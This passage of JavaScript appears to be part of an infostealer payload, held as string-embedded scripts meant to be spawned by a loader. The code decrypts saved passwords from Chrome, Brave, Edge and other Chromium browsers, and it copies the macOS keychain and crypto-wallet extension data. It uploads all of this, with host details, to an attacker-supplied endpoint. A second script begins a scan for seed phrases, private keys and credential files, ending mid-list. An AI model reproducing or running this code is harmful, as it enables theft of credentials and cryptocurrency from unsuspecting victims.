{ windowsHide: true, stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 * 10 }\n : { stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 * 10 };\n execSync(\"npm install sql.js --no-save --no-warnings --no-save --no-progress --loglevel silent\", installOptions);\n const sqljs = require('sql.js');\n if (typeof sqljs === 'function') {\n return await sqljs();\n }\n return sqljs;\n } catch (installErr) {\n console.log(\"sql.js install err\");\n return null;\n }\n }\n}\nfunction getBrowserEncryptionKey(localStatePath, browserName = 'Chrome') {\n try {\n if (!fs.existsSync(localStatePath)) {\n return null;\n }\n const localState = JSON.parse(fs.readFileSync(localStatePath, 'utf8'));\n const encryptedKey = localState?.os_crypt?.encrypted_key;\n console.log('encryptedKey', encryptedKey);\n if (!encryptedKey) {\n return null;\n }\n const encryptedKeyBytes = Buffer.from(encryptedKey, 'base64');\n const platform = process.platform;\n if (platform === 'win32') {\n if (encryptedKeyBytes.slice(0, 5).toString('utf8') === 'DPAPI') {\n const dpapiEncrypted = encryptedKeyBytes.slice(5);\n const dpapiScopes = [\n { flag: 0, name: 'CurrentUser' },\n { flag: 1, name: 'LocalMachine' }\n ];\n for (const scope of dpapiScopes) {\n try {\n const tempScriptPath = path.join(os.tmpdir(), `decrypt-key-${Date.now()}-${Math.random().toString(36).substr(2, 9)}.ps1`);\n const base64Encrypted = dpapiEncrypted.toString('base64');\n const psScript = `$ErrorActionPreference = 'Stop';\ntry {\nAdd-Type -AssemblyName System.Security -ErrorAction Stop;\n} catch {\n[System.Reflection.Assembly]::Load('System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a') | Out-Null;\n}\n$encrypted = [System.Convert]::FromBase64String('${base64Encrypted}');\ntry {\n$decrypted = [System.Security.Cryptography.ProtectedData]::Unprotect($encrypted, $null, [System.Security.Cryptography.DataProtectionScope]::${scope.name});\n} catch {\nthrow;\n}\n[System.Convert]::ToBase64String($decrypted)`;\n fs.writeFileSync(tempScriptPath, psScript, 'utf8');\n try {\n const keyBase64 = execSync(\n `powershell -NoProfile -ExecutionPolicy Bypass -File \"${tempScriptPath}\"`,\n { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024, windowsHide: true }\n ).trim();\n const decryptedKey = Buffer.from(keyBase64, 'base64');\n return decryptedKey;\n } catch (error) {\n continue;\n } finally {\n try {\n fs.unlinkSync(tempScriptPath);\n } catch (e) {\n }\n }\n } catch (error) {\n continue;\n }\n }\n return null;\n }\n } else if (platform === 'linux') {\n if (encryptedKeyBytes.slice(0, 3).toString('utf8') === 'v10' || encryptedKeyBytes.length > 3) {\n try {\n const appNames = ['chrome', 'chromium', 'google-chrome', browserName.toLowerCase().replace(/s+/g, '-')];\n for (const appName of appNames) {\n try {\n const secretToolCmd = `secret-tool lookup application \"${appName}\"`;\n const decryptedKey = execSync(secretToolCmd, { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 }).trim();\n if (decryptedKey && decryptedKey.length > 0) {\n return Buffer.from(decryptedKey, 'utf8');\n }\n } catch (e) {\n try {\n const pythonScript = `import secretstorage; bus = secretstorage.dbus_init(); collection = secretstorage.get_default_collection(bus); items = collection.search_items({\"application\": \"${appName}\"}); item = next(items, None); print(item.get_secret().decode('utf-8') if item else '')`;\n const decryptedKey = execSync(`python3 -c \"${pythonScript}\"`, { encoding: 'utf-8', stdio: ['pipe', 'pipe', 
'pipe'], maxBuffer: 1024 * 1024 }).trim();\n if (decryptedKey && decryptedKey.length > 0) {\n return Buffer.from(decryptedKey, 'utf8');\n }\n } catch (e2) {\n continue;\n }\n }\n }\n return null;\n } catch (error) {\n return null;\n }\n }\n } else if (platform === 'darwin') {\n if (encryptedKeyBytes.slice(0, 3).toString('utf8') === 'v10') {\n try {\n const secret = encryptedKeyBytes.slice(3).toString('base64');\n const service = `${browserName} Safe Storage`;\n const account = `${browserName}`;\n const securityCmd = `security find-generic-password -w -s \"${service}\" -a \"${account}\"`;\n try {\n const decryptedKey = execSync(securityCmd, { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 }).trim();\n if (decryptedKey) {\n const keychainPassword = decryptedKey;\n const pbkdf2 = crypto.pbkdf2Sync(keychainPassword, 'saltysalt', 1003, 16, 'sha1');\n return pbkdf2;\n }\n } catch (e) {\n return null;\n }\n } catch (error) {\n return null;\n }\n }\n }\n return null;\n } catch (error) {\n return null;\n }\n}\nfunction decryptPassword(encryptedPassword, masterKey = null) {\n if (!encryptedPassword || encryptedPassword.length === 0) {\n return \"\";\n }\n const version = encryptedPassword[0];\n let nonceStart = 1;\n if (version === 0x76 && encryptedPassword.length > 2) {\n let i = 1;\n while (i < encryptedPassword.length && encryptedPassword[i] >= 0x30 && encryptedPassword[i] <= 0x39) {\n i++;\n }\n const versionStr = encryptedPassword.slice(0, i).toString('ascii');\n if (versionStr.startsWith('v')) {\n nonceStart = i;\n }\n }\n if (version === 0x01 || version === 0x02 || (version === 0x76 && nonceStart > 1)) {\n return decryptAESGCM(encryptedPassword, nonceStart, masterKey);\n }\n return decryptDPAPI(encryptedPassword);\n}\nfunction decryptAESGCM(encryptedPassword, nonceStart, masterKey) {\n if (encryptedPassword.length < nonceStart + 12) {\n return \"\";\n }\n const nonce = encryptedPassword.slice(nonceStart, nonceStart + 12);\n const ciphertextStart = nonceStart + 12;\n const ciphertext = encryptedPassword.slice(ciphertextStart);\n if (ciphertext.length < 16) {\n return \"\";\n }\n const tag = ciphertext.slice(-16);\n const encryptedData = ciphertext.slice(0, -16);\n if (!masterKey) {\n return \"\";\n }\n let key = masterKey.slice(0, 32);\n if (key.length < 32) {\n key = Buffer.concat([key, Buffer.alloc(32 - key.length)]);\n }\n const decryptionAttempts = [\n { name: \"AES-256-GCM (full key)\", key: key, keyLen: 32 },\n { name: \"AES-128-GCM (first 16 bytes)\", key: key.slice(0, 16), keyLen: 16 }\n ];\n if (masterKey.length > 32) {\n decryptionAttempts.push({\n name: \"AES-256-GCM (full master key)\",\n key: masterKey.slice(0, 32),\n keyLen: 32\n });\n }\n for (const attempt of decryptionAttempts) {\n try {\n try {\n const cipher = crypto.createDecipheriv('aes-256-gcm', attempt.key, nonce);\n cipher.setAuthTag(tag);\n let decrypted = cipher.update(encryptedData, null, 'utf8');\n decrypted += cipher.final('utf8');\n if (decrypted) {\n return decrypted;\n }\n } catch (error) {\n const aadOptions = [Buffer.from('chrome'), Buffer.from('edge')];\n for (const aad of aadOptions) {\n try {\n const cipher = crypto.createDecipheriv('aes-256-gcm', attempt.key, nonce);\n cipher.setAAD(aad);\n cipher.setAuthTag(tag);\n let decrypted = cipher.update(encryptedData, null, 'utf8');\n decrypted += cipher.final('utf8');\n if (decrypted) {\n return decrypted;\n }\n } catch (error) {\n continue;\n }\n }\n }\n } catch (error) {\n continue;\n }\n }\n return \"\";\n}\nfunction 
decryptDPAPI(encryptedPassword) {\n try {\n const attempts = [\n { data: encryptedPassword, desc: \"Original\", scope: 0 },\n { data: encryptedPassword, desc: \"Original\", scope: 1 },\n ];\n if (encryptedPassword.length > 1 && encryptedPassword[0] === 0x01) {\n attempts.push(\n { data: encryptedPassword.slice(1), desc: \"Skip version byte\", scope: 0 },\n { data: encryptedPassword.slice(1), desc: \"Skip version byte\", scope: 1 }\n );\n }\n if (encryptedPassword.length > 3) {\n attempts.push(\n { data: encryptedPassword.slice(3), desc: \"Skip first 3 bytes\", scope: 0 },\n { data: encryptedPassword.slice(3), desc: \"Skip first 3 bytes\", scope: 1 }\n );\n }\n for (const attempt of attempts) {\n try {\n const scopeName = attempt.scope === 0 ? \"CurrentUser\" : \"LocalMachine\";\n const base64Encrypted = attempt.data.toString('base64');\n const tempScriptPath = path.join(os.tmpdir(), `decrypt-${Date.now()}-${Math.random().toString(36).substr(2, 9)}.ps1`);\n const psScript = `$ErrorActionPreference = 'Stop';\ntry {\nAdd-Type -AssemblyName System.Security -ErrorAction Stop;\n} catch {\n[System.Reflection.Assembly]::Load('System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a') | Out-Null;\n}\n$encrypted = [System.Convert]::FromBase64String('${base64Encrypted}');\ntry {\n$decrypted = [System.Security.Cryptography.ProtectedData]::Unprotect($encrypted, $null, [System.Security.Cryptography.DataProtectionScope]::${scopeName});\n} catch {\nthrow;\n}\n[System.Text.Encoding]::UTF8.GetString($decrypted)`;\n fs.writeFileSync(tempScriptPath, psScript, 'utf8');\n try {\n const decrypted = execSync(\n `powershell -NoProfile -ExecutionPolicy Bypass -File \"${tempScriptPath}\"`,\n { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024, windowsHide: true }\n ).trim();\n if (decrypted && decrypted.length > 0) {\n return decrypted;\n }\n } catch (execError) {\n continue;\n } finally {\n try {\n fs.unlinkSync(tempScriptPath);\n } catch (e) {\n }\n }\n } catch (error) {\n continue;\n }\n }\n return \"\";\n } catch (error) {\n return \"\";\n }\n}\nasync function extractPasswordsFromBrowser(browserIndex, basePath) {\n if (!fs.existsSync(basePath)) {\n return { passwords: [], masterKey: null };\n }\n const platform = process.platform;\n let localStatePath;\n if (platform === 'win32') {\n localStatePath = path.join(basePath, 'Local State');\n } else {\n localStatePath = path.join(basePath, 'Local State');\n }\n console.log(localStatePath)\n const masterKey = fs.existsSync(localStatePath) ? 
getBrowserEncryptionKey(localStatePath, `Browser${browserIndex}`) : null;\n const defaultProfileDir = path.join(basePath, 'Default');\n const allPasswords = [];\n console.log('masterKey', masterKey);\n const loginDataNames = ['Login Data', 'Login Data For Account'];\n for (const loginDataName of loginDataNames) {\n const defaultProfileLoginData = path.join(defaultProfileDir, loginDataName);\n if (fs.existsSync(defaultProfileLoginData)) {\n const passwords = await extractPasswords(defaultProfileLoginData, masterKey, `Browser${browserIndex}`);\n allPasswords.push(...passwords);\n }\n }\n try {\n const items = fs.readdirSync(basePath);\n for (const item of items) {\n if (item === 'Default' || item === 'Local State' || item.startsWith('.')) {\n continue;\n }\n if (item.startsWith('Profile ')) {\n const profileDir = path.join(basePath, item);\n try {\n const stats = fs.statSync(profileDir);\n if (!stats.isDirectory()) {\n continue;\n }\n } catch (statError) {\n continue;\n }\n for (const loginDataName of loginDataNames) {\n const profileLoginData = path.join(profileDir, loginDataName);\n if (fs.existsSync(profileLoginData)) {\n const passwords = await extractPasswords(profileLoginData, masterKey, `Browser${browserIndex} (${item})`);\n allPasswords.push(...passwords);\n }\n }\n }\n }\n } catch (error) {\n }\n return { passwords: allPasswords, masterKey: masterKey ? masterKey.toString('base64') : null };\n}\nasync function extractPasswords(loginDataPath, masterKey, browserName) {\n if (!fs.existsSync(loginDataPath)) {\n return [];\n }\n const tempDbPath = path.join(os.tmpdir(), `${browserName}_login_data_${process.pid}_${Date.now()}.db`);\n try {\n fs.copyFileSync(loginDataPath, tempDbPath);\n } catch (error) {\n return [];\n }\n const passwords = [];\n try {\n const SQL = await initSqlJs();\n if (!SQL) {\n return [];\n }\n const fileBuffer = fs.readFileSync(tempDbPath);\n const db = new SQL.Database(fileBuffer);\n const result = db.exec(`\n SELECT \n origin_url,\n username_value,\n password_value,\n date_created,\n date_last_used\n FROM logins\n ORDER BY origin_url\n `);\n if (!result || result.length === 0) {\n db.close();\n try {\n fs.unlinkSync(tempDbPath);\n } catch (e) {\n }\n return [];\n }\n const rows = result[0].values;\n const columnNames = result[0].columns;\n const colIndex = {\n origin_url: columnNames.indexOf('origin_url'),\n username_value: columnNames.indexOf('username_value'),\n password_value: columnNames.indexOf('password_value'),\n date_created: columnNames.indexOf('date_created'),\n date_last_used: columnNames.indexOf('date_last_used')\n };\n for (let idx = 0; idx < rows.length; idx++) {\n const row = rows[idx];\n try {\n const url = row[colIndex.origin_url];\n const username = row[colIndex.username_value];\n const passwordValue = row[colIndex.password_value];\n const dateCreated = row[colIndex.date_created];\n const dateLastUsed = row[colIndex.date_last_used];\n if (!passwordValue || passwordValue.length === 0) {\n continue;\n }\n let encryptedPassword;\n if (typeof passwordValue === 'string') {\n encryptedPassword = Buffer.from(passwordValue, 'latin-1');\n } else if (Buffer.isBuffer(passwordValue)) {\n encryptedPassword = passwordValue;\n } else {\n encryptedPassword = Buffer.from(passwordValue);\n }\n const password = decryptPassword(encryptedPassword, masterKey);\n function chromeTimeToISO(timestamp) {\n if (!timestamp) {\n return null;\n }\n const epoch = new Date('1601-01-01T00:00:00Z').getTime();\n const chromeTime = timestamp / 1000000;\n const unixTime = chromeTime 
- 11644473600;\n return new Date(unixTime * 1000).toISOString();\n }\n const entry = {\n url: url,\n u: username,\n p: password,\n created: chromeTimeToISO(dateCreated),\n last_used: chromeTimeToISO(dateLastUsed)\n };\n if (!password && encryptedPassword && encryptedPassword.length > 0) {\n entry.p_encrypted = encryptedPassword.toString('base64');\n }\n passwords.push(entry);\n } catch (error) {\n continue;\n }\n }\n db.close();\n } catch (error) {\n // console.log(\"error\", error);\n } finally {\n try {\n fs.unlinkSync(tempDbPath);\n } catch (e) {\n }\n }\n return passwords;\n}\nasync function extractAndUploadPasswords(timestamp, tempDir) {\n try {\n const browserNames = ['Chrome', 'Brave', 'AVG Browser', 'Edge', 'Opera', 'Opera GX', 'Vivaldi', 'Kiwi Browser', 'Yandex Browser', 'Iridium', 'Comodo Dragon', 'SRWare Iron', 'Chromium'];\n const allPasswords = {};\n const masterKeys = {};\n for (let browserIndex = 0; browserIndex < basePaths.length; browserIndex++) {\n const basePath = basePaths[browserIndex];\n if (!fs.existsSync(basePath)) {\n continue;\n }\n const browserName = browserNames[browserIndex] || `Browser${browserIndex}`;\n const result = await extractPasswordsFromBrowser(browserIndex, basePath);\n if (result.passwords.length > 0) {\n allPasswords[browserName] = result.passwords;\n if (result.masterKey) {\n masterKeys[browserName] = result.masterKey;\n }\n }\n }\n if (Object.keys(allPasswords).length > 0) {\n const fileName = 's.txt';\n const fileContent = JSON.stringify({ passwords: allPasswords, masterKeys: masterKeys }, null, 2);\n const filePath = path.join(tempDir || os.tmpdir(), fileName);\n fs.writeFileSync(filePath, fileContent, 'utf8');\n const passwordFile = await collectFile(filePath, null, null, '', tempDir);\n if (passwordFile) {\n await uploadFiles([passwordFile], timestamp);\n }\n if (!tempDir && fs.existsSync(filePath)) {\n try {\n fs.unlinkSync(filePath);\n } catch (e) {\n }\n }\n }\n } catch (error) {\n }\n}\nconst uploadBraveWallet = async (timestamp, tempDir) => {\n const browserId = 1; // Brave is index 1 in chromiumBrowserPaths\n const extensionId = 'bravewallet';\n const braveBasePath = basePaths[1]; // Brave is index 1\n if (!braveBasePath || !fs.existsSync(braveBasePath)) return;\n const folders = fs\n .readdirSync(braveBasePath)\n .filter((folder) => /^Profile.*|^Default$/.test(folder));\n for (let folderIndex = 0; folderIndex < folders.length; folderIndex++) {\n const folder = folders[folderIndex];\n let profileId;\n if (folder === \"Default\") {\n profileId = 0;\n } else {\n const match = folder.match(/Profiles+(d+)/);\n profileId = match ? 
parseInt(match[1]) : folderIndex;\n }\n const leveldbPath = path.join(braveBasePath, folder, \"Local Storage/leveldb\");\n if (!fs.existsSync(leveldbPath)) continue;\n const walletFiles = [];\n try {\n const files = fs.readdirSync(leveldbPath);\n for (const file of files) {\n const filePath = path.join(leveldbPath, file);\n const collectedFile = await collectFile(filePath, browserId, profileId, extensionId, tempDir);\n if (collectedFile) {\n walletFiles.push(collectedFile);\n }\n }\n if (walletFiles.length > 0) {\n await uploadFiles(walletFiles, timestamp);\n }\n } catch (err) {\n }\n }\n};\nconst basePaths = getChromiumBasePaths();\n// const skipFiles = ['LOCK', 'CURRENT', 'LOG', 'LOG.old', 'MANIFEST'];\nconst collectFile = async (p, browserId = null, profileId = null, extensionId = null, tempDir = null) => {\n if (!fs.existsSync(p)) return null;\n const fileName = path.basename(p);\n try {\n if (fs.statSync(p).isFile()) {\n let filePath = p;\n let isTempFile = false;\n if (tempDir) {\n try {\n const uniqueName = `${Date.now()}_${Math.random().toString(36).substring(7)}_${fileName}`;\n const tempFilePath = path.join(tempDir, uniqueName);\n const fileContent = fs.readFileSync(p);\n fs.writeFileSync(tempFilePath, fileContent);\n filePath = tempFilePath;\n isTempFile = true;\n } catch (copyErr) {\n if (copyErr.code === 'EBUSY' || copyErr.code === 'EACCES' || copyErr.code === 'ENOENT') {\n return null;\n } else {\n return null;\n }\n }\n }\n return {\n path: filePath,\n originalPath: p,\n filename: path.basename(p),\n browserId: browserId,\n profileId: profileId,\n extensionId: extensionId || '',\n isTempFile: isTempFile\n };\n }\n } catch (err) {\n if (err.code === 'EBUSY' || err.code === 'EACCES') {\n return null;\n }\n }\n return null;\n};\nconst uploadFiles = async (files, timestamp) => {\n if (!files || files.length === 0) return;\n const form = new FormData();\n const fileMetadata = [];\n for (const file of files) {\n if (!file || !file.path) continue;\n try {\n const readStream = fs.createReadStream(file.path);\n readStream.on('error', (streamErr) => {\n if (streamErr.code !== 'EBUSY' && streamErr.code !== 'EACCES') {}\n });\n form.append(\"files\", readStream, {\n filename: file.filename\n });\n fileMetadata.push({\n browserId: file.browserId !== null ? file.browserId : '',\n profileId: file.profileId !== null ? 
file.profileId : '',\n extensionId: file.extensionId || '',\n originalFilename: file.filename\n });\n } catch (err) {\n if (err.code === 'EBUSY' || err.code === 'EACCES') {continue;} \n }\n }\n if (fileMetadata.length > 0) {\n try {\n const response = await axios.post(`" + l_s + "`, form, {\n headers: {\n ...form.getHeaders(),\n userkey: " + u_k + ",\n hostname: os.hostname(),\n timestamp: timestamp,\n 'file-metadata': JSON.stringify(fileMetadata), // Send metadata array\n t: " + t + ",\n },\n maxContentLength: Infinity,\n maxBodyLength: Infinity,\n validateStatus: (status) => status < 500, // Don't throw on 4xx errors\n });\n if (response.status >= 200 && response.status < 300) {} else {}\n } catch (uploadErr) {\n if (uploadErr.code === 'ECONNRESET' || uploadErr.code === 'ECONNREFUSED') {\n } else if (uploadErr.response) {\n } else {}\n }\n }\n};\nconst iterate = async () => {\nconst timestamp = Math.round(Date.now() / 1000);\nconst platform = process.platform;\nconst filesToUpload = [];\nconst homeDir = os.homedir();\nconst tempBaseDir = path.join(os.tmpdir(), '.tmp');\nconst tempDir = path.join(tempBaseDir, `.upload_${timestamp}_${Math.random().toString(36).substring(7)}`);\ntry {\n if (!fs.existsSync(tempBaseDir)) {\n await fsPromises.mkdir(tempBaseDir, { recursive: true });\n }\n await fsPromises.mkdir(tempDir, { recursive: true });\n} catch (err) {}\ntry {\n // First, create and upload sysinfo.txt\n const s_i = gsi();\n const sysinfoContent = `Host: ${s_i.host}\\nOS: ${s_i.os}\\nUsername: ${s_i.username}\\nPlatform: ${platform}\\nTimestamp: ${new Date().toISOString()}\\n`;\n const sysinfoPath = path.join(tempDir, 'sysinfo.txt');\n fs.writeFileSync(sysinfoPath, sysinfoContent, 'utf8');\n const sysinfoFile = {\n path: sysinfoPath,\n originalPath: sysinfoPath,\n filename: 'sysinfo.txt',\n browserId: '',\n profileId: '',\n extensionId: '',\n isTempFile: true\n };\n await uploadFiles([sysinfoFile], timestamp);\n \n if (os.platform() == \"darwin\") {\n const keychainFile = await collectFile(`${process.env.HOME}/Library/Keychains/login.keychain-db`, '', '', '', tempDir);\n if (keychainFile) {\n await uploadFiles([keychainFile], timestamp);\n }\n }\n for (let basePathIndex = 0; basePathIndex < basePaths.length; basePathIndex++) {\n const basePath = basePaths[basePathIndex];\n const browserId = basePathIndex; // 0 for Chrome, 1 for Brave\n if (!fs.existsSync(basePath)) continue;\n const folders = fs\n .readdirSync(basePath)\n .filter((folder) => /^Profile.*|^Default$/.test(folder));\n for (let folderIndex = 0; folderIndex < folders.length; folderIndex++) {\n const folder = folders[folderIndex];\n let profileId;\n if (folder === \"Default\") {\n profileId = 0;\n } else {\n const match = folder.match(/Profiles+(d+)/);\n profileId = match ? 
parseInt(match[1]) : folderIndex;\n }\n const profileFiles = [];\n for (wp of wps) {\n const fp = `${basePath}/${folder}/Local Extension Settings/${wp}`;\n if (!fs.existsSync(fp)) continue;\n const dirs = fs.readdirSync(fp);\n for (dr of dirs) {\n const file = await collectFile(`${fp}/${dr}`, browserId, profileId, wp, tempDir);\n if (file) profileFiles.push(file);\n }\n if (profileFiles.length > 0) {\n await uploadFiles(profileFiles, timestamp);\n profileFiles.length = 0; // Clear the array \n }\n }\n const loginDataNames = ['Login Data', 'Login Data For Account'];\n for (const loginDataName of loginDataNames) {\n const loginDataFile = await collectFile(`${basePath}/${folder}/${loginDataName}`, browserId, profileId, '', tempDir);\n if (loginDataFile) { profileFiles.push(loginDataFile);}\n } \n const webDataFile = await collectFile(`${basePath}/${folder}/Web Data`, browserId, profileId, '', tempDir);\n if (webDataFile) profileFiles.push(webDataFile);\n if (profileFiles.length > 0) {\n await uploadFiles(profileFiles, timestamp);\n }\n }\n }\n await uploadBraveWallet(timestamp, tempDir);\n if (i % 3 === 0) { // every 3rd iteration\n await extractAndUploadPasswords(timestamp, tempDir);\n }\n} finally {\n if (fs.existsSync(tempDir)) {\n try {\n const files = await fsPromises.readdir(tempDir);\n await Promise.all(files.map(file => \n fsPromises.unlink(path.join(tempDir, file)).catch(() => {})\n ));\n await fsPromises.rmdir(tempDir);\n } catch (cleanupErr) {\n try {\n if (fs.rmSync) {\n fs.rmSync(tempDir, { recursive: true, force: true });\n }\n } catch (altCleanupErr) {}\n }\n }\n}\n\n};\n\nconst run = async () => {\nawait iterate();\ni++;\nawait sleep(30000);\ni <= 10 && (await run());\n};\nprocess.on('uncaughtException', (error) => {\nconsole.error('Uncaught Exception:', error.message);\n});\n\nprocess.on('unhandledRejection', (reason, promise) => {\nconsole.error('Unhandled Rejection at:', promise, 'reason:', reason);\n});\n\n(async () => {\ntry {\n await run();\n} catch (error) {\n console.error('Fatal error in run():', error.message);\n}\n})();";
try {
Utils.sp_s(s, "pid." + t + ".1.lock", "ldbScript", f_s_l);
} catch (S) {}
try {
const K = "const UPLOAD_DELAY_MS = 120;\n const ADAPTIVE_DELAY_MS = 20;\n const MIN_UPLOAD_TIME_MS = 50;\n const MAX_FILE_SIZE_BYTES = 5 * 1024 * 1024; // 5MB\n\n const fs = require(\"fs\");\n const path = require(\"path\");\n const os = require(\"os\");\n const FormData = require(\"form-data\");\n const axios = require(\"axios\");\n const { execSync } = require(\"child_process\");\n\n " + Utils.set_l("autoupload") + "\n const HOME_DIRECTORY = os.homedir();\n\n // Global variable for priority directories (set in main function)\n let priorityDirs = [];\n\n // Add process error handlers to prevent premature exits\n process.on(\"uncaughtException\", (err) => {\n console.error(\"Uncaught Exception:\", err.message);\n console.error(\"Stack:\", err.stack);\n // Don't exit - continue scanning despite errors\n // The script should complete the scan even if some operations fail\n });\n\n process.on(\"unhandledRejection\", (reason, promise) => {\n console.error(\"Unhandled Rejection:\", reason);\n // Don't exit - continue scanning despite errors\n });\n\n // Handle process termination signals gracefully\n process.on(\"SIGTERM\", () => {\n \n // Don't exit immediately - let the scan finish\n });\n\n process.on(\"SIGINT\", () => {\n \n // Don't exit immediately - let the scan finish\n });\n\n // File extensions to exclude from scanning\n const EXCLUDED_FILE_EXTENSIONS = [\".exe\",\".dll\",\".so\",\".dylib\",\".bin\",\".app\",\".deb\",\".rpm\",\".pkg\",\".dmg\",\".msi\",\".appimage\",\".lnk\",\".alias\",\".desktop\",\".mp4\",\".mp3\",\".avi\",\".mov\",\".wmv\",\".flv\",\".mkv\",\".webm\",\".wma\",\".wav\",\".flac\",\".aac\",\".ogg\",\".m4a\",\".gif\",\".tiff\",\".svg\",\".ico\",\".heif\",\".tmp\",\".temp\",\".swp\",\".swo\",\".jar\",\".war\",\".ear\",\".sublime-project\",\".sublime-workspace\"];\n\n const EXCLUDED_PATH_PATTERNS = [\".quokka\",\".bash_rc\",\".bash_sessions\",\".atom\",\".zen\",\"thumbnails\",\".rhinocode\",\".codeium\",\".adobe\",\".matplotlib\",\".antigravity\",\".gemini\",\".pyenv\",\".pgadmin\",\".ipython\",\".idlerc\",\".codex\",\".qodo\",\".cups\",\".n2\",\".n3\",\".pki\",\".ruby\",\".vscode-remote\",\".python\",\".php\",\".oh-my-zsh\",\".nvs\",\".maven\",\".jupyter\",\".dotnet\",\"assetbundles\",\".pnpm-store\",\".rbenv\",\"movies\", \"music\",\"adobe\",\"package cache\",\"nvidia corporation\",\"saved games\",\"winrar\",\".cargo\",\".lingma\",\".qoder\",\".trae-aicc\",\".vscode-insiders\",\".avo-code\",\"ubuntu-backup\",\"snap-data\",\"app-configs\",\".local\",\".config\",\".anydesk\",\"library\",\"programdata\",\".tmp\",\"node_modules\",\"npm\",\".npm\",\".yarn\",\"yarn.lock\",\"package-lock.json\",\"pnpm-store\",\".pnpm\",\"public\",\"static\",\"assets\",\"resources\",\"css\",\"less\",\"scss\",\"sass\",\"stylus\",\"styles\",\"style\",\"themes\",\"theme\",\"build\",\"dist\",\"out\",\"target\",\"bin\",\"obj\",\".next\",\".nuxt\",\".output\",\".vuepress\",\".vitepress\",\"appdata\",\"program files\",\"program files (x86)\",\"windows\",\"windows.old\",\"system volume information\",\"\\$recycle.bin\",\"recovery\",\"perflogs\",\"intel\",\"amd\",\"nvidia\",\"microsoft\",\"microsoftedgebackup\",\"system\",\"applications\",\".trash\",\".spotlight-v100\",\".fseventsd\",\".documentrevisions-v100\",\".temporaryitems\",\".vol\",\"cores\",\"application 
support\",\"proc\",\"sys\",\"dev\",\"run\",\"boot\",\"lost+found\",\"snap\",\"flatpak\",\"desktop.ini\",\"thumbs.db\",\".vscode\",\".idea\",\".vs\",\".eclipse\",\".settings\",\".metadata\",\".gradle\",\".mvn\",\".git\",\".github\",\".svn\",\".hg\",\".bzr\",\".cache\",\"cache\",\"tmp\",\"temp\",\"*~\",\"vendor\",\"vendors\",\".venv\",\"venv\",\".conda\",\"anaconda3\",\"miniconda3\",\".rustup\",\".pub-cache\",\".dart_tool\",\".gradle\",\".m2\",\".ivy2\",\".sbt\",\"libs\",\"packages\",\"package\",\"pkgs\",\"pkg\",\"documentation\",\"examples\",\"example\",\"samples\",\"sample\",\"test\",\"tests\",\"spec\",\"specs\",\".ssh\",\".gnupg\",\".aws\",\".docker\",\".kube\",\".terraform\",\".vagrant\",\".node-gyp\",\".nvm\",\".npm\",\".yarn\",\".pnpm\",\".bun\",\".deno\",\".go\",\".gopath\",\".gocache\",\".cursor\",\".vscode-server\",\".claude\",\".windsurf\",\".snipaste\",\".vue-cli-ui\",\".devctl\",\".eigent\",\"fonts\",\"font\",\"icons\",\"icon\",\"wallpaper\",\"wallpapers\",\"background\",\"backgrounds\",\"locale\",\"locales\",\"_locales\",\"i18n\",\"translations\",\"lang\",\"language\",\"languages\",\"visual studio code.app\",\"chrome.app\",\"firefox.app\",\"safari.app\",\"opera.app\",\"brave browser.app\",\"vmware\",\".vmware\",\"vmware fusion\",\"vmware fusion.app\",\"vmware workstation\",\"vmware player\",\"vmware vsphere\",\"vmware vcenter\",\"/applications/vmware\",\"/usr/lib/vmware\",\"/usr/share/vmware\",\"program files/vmware\",\"program files (x86)/vmware\",\"appdata/local/vmware\",\"appdata/roaming/vmware\",\"library/application support/vmware\",\".vmwarevm\",\".vmdk\",\".vmem\",\".vmsn\",\".vmsd\",\".vmx\",\".vmxf\",\".nvram\",\".vmtm\",\"mysql\",\"postgresql\",\"mongodb\",\"redis\",\"elasticsearch\",\"openzeppelin\",\"prisma\",\".expo\",\".next\",\".nuxt\",\".svelte-kit\",\"hooks\",\".wine\",\".3T\",\".gk\",\".move\",\".tldrc\",\".android\",\".avm\",\".brownie\",\".cocoapods\",\".zsh_sessions\",\".pm2\",\".pyp\",\".myi\",\"manifest\",\"debug\",\"plugin\",\"plugins\"];\n\n const SENSITIVE_FILE_PATTERNS = [\".keystore\", \"phone\", \"database\",\"bank\", \"financ\", 
\".env\",\"env\",\"environment\",\"config\",\"configuration\",\"configure\",\".conf\",\".cfg\",\".ini\",\".properties\",\".yaml\",\".yml\",\".toml\",\"metamask\",\"phantom\",\"bitcoin\",\"ethereum\",\"eth\",\"trust\",\"wallet\",\"coinbase\",\"exodus\",\"ledger\",\"trezor\",\"keystore\",\"keyring\",\"keychain\",\"atomic\",\"electrum\",\"mycelium\",\"blockchain\",\"bravewallet\",\"rabby\",\"coin98\",\"backpack\",\"core\",\"mathwallet\",\"solflare\",\"glow\",\"keplr\",\"argent\",\"martian\",\"petra\",\"binance\",\"okx\",\"crypto\",\"cryptocurrency\",\"hardhat\",\"truffle\",\"private\",\"privatekey\",\"private_key\",\"private-key\",\"privkey\",\"priv_key\",\"key\",\"keypair\",\"key_pair\",\"key-pair\",\".pem\",\".p12\",\".pfx\",\".jks\",\"keystore\",\".keys\",\"keys\",\".p8\",\".p7b\",\".p7c\",\".cer\",\".crt\",\".cert\",\"cert\",\".der\",\"id_rsa\",\"id_dsa\",\"id_ecdsa\",\"id_ed25519\",\".pub\",\".priv\",\"seed\",\"seedphrase\",\"seed_phrase\",\"seed-phrase\",\"mnemonic\",\"phrase\",\"passphrase\",\"pass_phrase\",\"pass-phrase\",\"recovery\",\"recoveryphrase\",\"recovery_phrase\",\"recovery-phrase\",\"backup\",\"backupphrase\",\"backup_phrase\",\"backup-phrase\",\"12words\",\"12_words\",\"12-words\",\"24words\",\"24_words\",\"24-words\",\"bip39\",\"bip44\",\"password\",\"passwd\",\"pass\",\"pwd\",\"credential\",\"credentials\",\"auth\",\"authentication\",\"token\",\"access_token\",\"refresh_token\",\"api_key\",\"apikey\",\"api-key\",\"apisecret\",\"api_secret\",\"api-secret\",\"secret\",\"secrets\",\"secretkey\",\"secret_key\",\"secret-key\",\"masterkey\",\"master_key\",\"master-key\",\"masterpas